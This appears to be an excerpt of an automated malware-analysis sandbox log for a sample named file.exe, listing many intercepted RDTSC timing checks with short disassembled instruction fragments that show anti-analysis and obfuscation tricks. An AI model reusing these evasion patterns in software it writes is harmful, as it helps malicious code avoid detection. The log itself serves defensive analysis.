              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9123 second address: AC9150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 jmp 00007FD185A97D15h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EDCC second address: A9EDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EDD0 second address: A9EDEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D14h 0x00000007 je 00007FD185A97D06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EDEE second address: A9EDF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9EDF4 second address: A9EE1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Bh 0x00000007 jmp 00007FD185A97D13h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9A78 second address: AC9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD184FDBE76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9A84 second address: AC9AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D15h 0x00000009 popad 0x0000000a pop ecx 0x0000000b jl 00007FD185A97D0Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC919 second address: ACC91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDA32 second address: ACDA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDA39 second address: ACDA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACDA3F second address: ACDA43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD59FD second address: AD5A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD184FDBE76h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5A0D second address: AD5A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5A11 second address: AD5A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD51D8 second address: AD5202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D18h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FD185A97D0Bh 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5522 second address: AD552D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD184FDBE76h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD552D second address: AD5533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5533 second address: AD5537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD585E second address: AD586D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD586D second address: AD5871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD61E9 second address: AD6233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 add dword ptr [esp], 14F19C13h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FD185A97D08h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push D5E640D1h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jmp 00007FD185A97D18h 0x00000033 pop edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6560 second address: AD6573 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD184FDBE78h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6573 second address: AD6579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD65EC second address: AD65F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD65F0 second address: AD65F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD67C1 second address: AD67C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6DED second address: AD6DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6DF1 second address: AD6DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6DF7 second address: AD6DFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6E9B second address: AD6E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6FBB second address: AD6FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6FBF second address: AD6FD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6FD0 second address: AD6FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD185A97D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD70C5 second address: AD70E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD184FDBE7Ah 0x0000000d pushad 0x0000000e jbe 00007FD184FDBE76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD73D6 second address: AD73FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FD185A97D18h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7874 second address: AD7878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8076 second address: AD807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7F1C second address: AD7F21 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD93A2 second address: AD93A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD89B8 second address: AD89BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA6D2 second address: ADA6DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADA6DC second address: ADA6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBD67 second address: ADBD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCB09 second address: ADCB77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD184FDBE78h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FD184FDBE78h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 jnc 00007FD184FDBE7Ch 0x0000004a push 00000000h 0x0000004c xor dword ptr [ebp+122D1A96h], esi 0x00000052 add esi, 0E139BFEh 0x00000058 xchg eax, ebx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCB77 second address: ADCB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0123 second address: AE0135 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jbe 00007FD184FDBE80h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0135 second address: AE019E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD185A97D08h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1A10h], eax 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+122D253Ch] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FD185A97D08h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov ebx, 0F55E600h 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop esi 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE019E second address: AE01B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jg 00007FD184FDBE7Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2360 second address: AE2364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE341B second address: AE341F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE506C second address: AE5086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD185A97D06h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FD185A97D0Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5086 second address: AE508B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2364 second address: AE2387 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD185A97D16h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6FDD second address: AE7013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD184FDBE76h 0x0000000a popad 0x0000000b jmp 00007FD184FDBE7Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD184FDBE89h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7013 second address: AE70A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD185A97D08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call 00007FD185A97D19h 0x00000029 jc 00007FD185A97D15h 0x0000002f jmp 00007FD185A97D0Fh 0x00000034 pop edi 0x00000035 mov ebx, 43E91245h 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1E0Fh], ebx 0x00000042 push 00000000h 0x00000044 pushad 0x00000045 mov dx, 8A5Ah 0x00000049 or dword ptr [ebp+122D2404h], edi 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jnp 00007FD185A97D06h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE616B second address: AE617B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FD184FDBE76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE617B second address: AE61F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD185A97D14h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FD185A97D08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, 0A6113D8h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D28BBh], ebx 0x00000040 mov eax, dword ptr [ebp+122D0ADDh] 0x00000046 mov edi, esi 0x00000048 push FFFFFFFFh 0x0000004a stc 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jnl 00007FD185A97D06h 0x00000055 jmp 00007FD185A97D13h 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E15 second address: AE8E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD184FDBE78h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1C04h], esi 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D214Bh], ebx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D28BBh], edx 0x00000039 push eax 0x0000003a pushad 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9F01 second address: AE9F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAF79 second address: AEAF87 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAF87 second address: AEAFDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FD185A97D08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D567Dh] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+1245AA5Fh], edx 0x00000033 push 00000000h 0x00000035 movzx ebx, ax 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a jg 00007FD185A97D0Ch 0x00000040 jl 00007FD185A97D06h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA140 second address: AEA146 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA146 second address: AEA14C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBFA2 second address: AEBFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB17C second address: AEB180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB180 second address: AEB21E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 nop 0x00000012 or bx, 56CBh 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push eax 0x0000001f add edi, dword ptr [ebp+122D29DEh] 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov edi, 7A0CA9D1h 0x00000032 mov eax, dword ptr [ebp+122D13F9h] 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FD184FDBE78h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007FD184FDBE7Eh 0x00000057 and ebx, 0D1BAEB4h 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FD184FDBE85h 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FD184FDBE85h 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB21E second address: AEB23A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECE7C second address: AECE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECE83 second address: AECEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD185A97D12h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED07D second address: AED081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED081 second address: AED087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED087 second address: AED08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED08D second address: AED091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEECD second address: AEEED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEED1 second address: AEEED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEED7 second address: AEEF30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, edi 0x0000000e add ebx, 148B0C7Fh 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 push edx 0x00000018 mov dx, bx 0x0000001b pop esi 0x0000001c adc ch, 00000054h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD184FDBE78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c sbb ebx, 5B184EEEh 0x00000042 mov bx, 4867h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b pop eax 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE025 second address: AEE029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE029 second address: AEE037 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF30 second address: AEEF3A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF3A second address: AEEF54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FD184FDBE7Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF54 second address: AEEF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F3B second address: AF1F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F3F second address: AF1F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
